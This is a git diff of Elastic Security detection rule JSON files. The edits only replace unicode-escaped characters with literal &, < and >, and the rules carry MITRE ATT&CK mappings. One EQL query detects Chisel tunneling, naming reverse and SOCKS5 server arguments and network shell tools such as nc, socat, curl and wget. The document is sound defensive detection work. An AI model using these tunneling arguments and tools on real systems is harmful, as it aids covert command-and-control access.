--- a/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac412404-57a5-476f-858f-4e8fbb4f48d8_106.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
@@ -77,7 +77,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json
index 489f3bdc07e..fbaaa5793a9 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_105.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Elastic",
@@ -76,7 +76,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json
index e2995897693..af066efb200 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_106.json
@@ -64,7 +64,7 @@
 ],
 "risk_score": 47,
 "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff",
- "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
+ "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.",
 "severity": "medium",
 "tags": [
 "Domain: Endpoint",
@@ -75,7 +75,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json
index 52864e0e1f3..0b324665884 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_107.json
@@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -76,7 +76,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json index cff06565fd0..3119b98ddbc 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_108.json 
@@ -64,7 +64,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -78,7 +78,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -93,7 +93,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -115,7 +115,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json index 57aaeb4d863..eb5432cc0b1 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json +++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_109.json 
@@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json index aea9200ee6f..5db04d23914 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json 
+++ b/packages/security_detection_engine/kibana/security_rule/ac5012b8-8da8-440b-aaaf-aedafdea2dff_110.json @@ -63,7 +63,7 @@ ], "risk_score": 47, "rule_id": "ac5012b8-8da8-440b-aaaf-aedafdea2dff", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -77,7 +77,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -92,7 +92,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -114,7 +114,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0004", "name": "Privilege Escalation", diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json index 8e2181a9cb0..b88e7593c6e 100644 
--- a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_1.json
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Server", - "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count \u003e= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", 
\"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -71,7 +71,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json index 54cc4bde9a5..4d4165e9027 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_2.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Server", - "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count \u003e= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", 
\"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json index 70325717750..d1a0ad718a4 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json +++ b/packages/security_detection_engine/kibana/security_rule/ac8805f6-1e08-406c-962e-3937057fa86f_3.json 
@@ -11,7 +11,7 @@ "language": "eql", "license": "Elastic License v2", "name": "Potential Protocol Tunneling via Chisel Server", - "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count \u003e= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", \"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", + "query": "sequence by host.id, process.entity_id with maxspan=1m\n [process where host.os.type == \"linux\" and event.action == \"exec\" and event.type == \"start\" and \n process.args == \"server\" and process.args in (\"--port\", \"-p\", \"--reverse\", \"--backend\", \"--socks5\") and \n process.args_count >= 3 and process.parent.name in (\"bash\", \"dash\", \"ash\", \"sh\", \"tcsh\", \"csh\", \"zsh\", \"ksh\", \"fish\")]\n [network where host.os.type == \"linux\" and event.action == \"connection_accepted\" and event.type == \"start\" and \n destination.ip != null and destination.ip != \"127.0.0.1\" and destination.ip != \"::1\" and \n not process.name : (\n \"python*\", \"php*\", \"perl\", \"ruby\", \"lua*\", \"openssl\", \"nc\", \"netcat\", \"ncat\", \"telnet\", \"awk\", \"java\", \"telnet\",\n \"ftp\", \"socat\", \"curl\", \"wget\", \"dpkg\", \"docker\", \"dockerd\", \"yum\", \"apt\", 
\"rpm\", \"dnf\", \"ssh\", \"sshd\", \"hugo\")]\n", "references": [ "https://blog.bitsadmin.com/living-off-the-foreign-land-windows-as-offensive-platform", "https://book.hacktricks.xyz/generic-methodologies-and-resources/tunneling-and-port-forwarding" @@ -72,7 +72,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0011", "name": "Command and Control", diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json index bbed0953553..05afa62c937 100644 --- a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json +++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_105.json 
@@ -44,7 +44,7 @@
 ],
 "risk_score": 73,
 "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "high",
 "tags": [
 "Elastic",
@@ -57,7 +57,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json
index 5613990b2c6..399daaa0968 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_106.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 73,
 "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46",
- "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
+ "setup": "The 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json
index 317d5dcd45d..619abc7340a 100644
--- a/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json
+++ b/packages/security_detection_engine/kibana/security_rule/ac96ceb8-4399-4191-af1d-4feeac1f1f46_107.json
@@ -44,7 +44,7 @@
 ],
 "risk_score": 73,
 "rule_id": "ac96ceb8-4399-4191-af1d-4feeac1f1f46",
- "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
+ "setup": "\nThe 'PowerShell Script Block Logging' logging policy must be configured (Enable).\n\nSteps to implement the logging policy with with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n",
 "severity": "high",
 "tags": [
 "Domain: Endpoint",
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json
index 6c75dc13bbd..450e05ca8e4 100644
--- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json
+++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_203.json
@@ -63,7 +63,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json
index ba78ac1be43..90197b6fae9 100644
--- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json
+++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_204.json
@@ -64,7 +64,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json
index 562cb587b28..ae9124f8848 100644
--- a/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json
+++ b/packages/security_detection_engine/kibana/security_rule/acbc8bb9-2486-49a8-8779-45fb5f9a93ee_205.json
@@ -62,7 +62,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json
index a987830d6be..68435e15de9 100644
--- a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json
+++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_102.json
@@ -91,7 +91,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -106,7 +106,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json
index 82f5c5f595f..b86332c89ce 100644
--- a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_103.json
@@ -90,7 +90,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -105,7 +105,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json
index e0474ca70e8..1f55fadbebc 100644
--- a/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/acd611f3-2b93-47b3-a0a3-7723bcc46f6d_104.json
@@ -91,7 +91,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0011",
 "name": "Command and Control",
@@ -106,7 +106,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json
index d8ec95d6582..045088879e0 100644
--- a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_103.json
@@ -61,7 +61,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0006",
 "name": "Credential Access",
diff --git a/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json b/packages/security_detection_engine/kibana/security_rule/ace1e989-a541-44df-93a8-a8b0591b63c0_104.json
index c98c0cc4184..00a2eac8354 100644
